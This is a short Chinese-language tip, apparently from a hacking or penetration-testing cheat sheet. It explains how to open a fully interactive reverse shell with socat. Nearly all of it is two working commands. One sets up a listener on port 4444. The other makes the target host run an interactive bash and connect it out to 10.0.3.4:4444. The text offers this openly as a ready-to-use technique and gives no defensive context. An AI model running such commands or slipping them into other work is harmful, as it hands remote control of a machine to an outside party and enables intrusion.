下载socat在客户端:socat file:`tty`,raw,echo=0 tcp-listen:4444在服务端:socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444如此即可创建功能完全的反向shell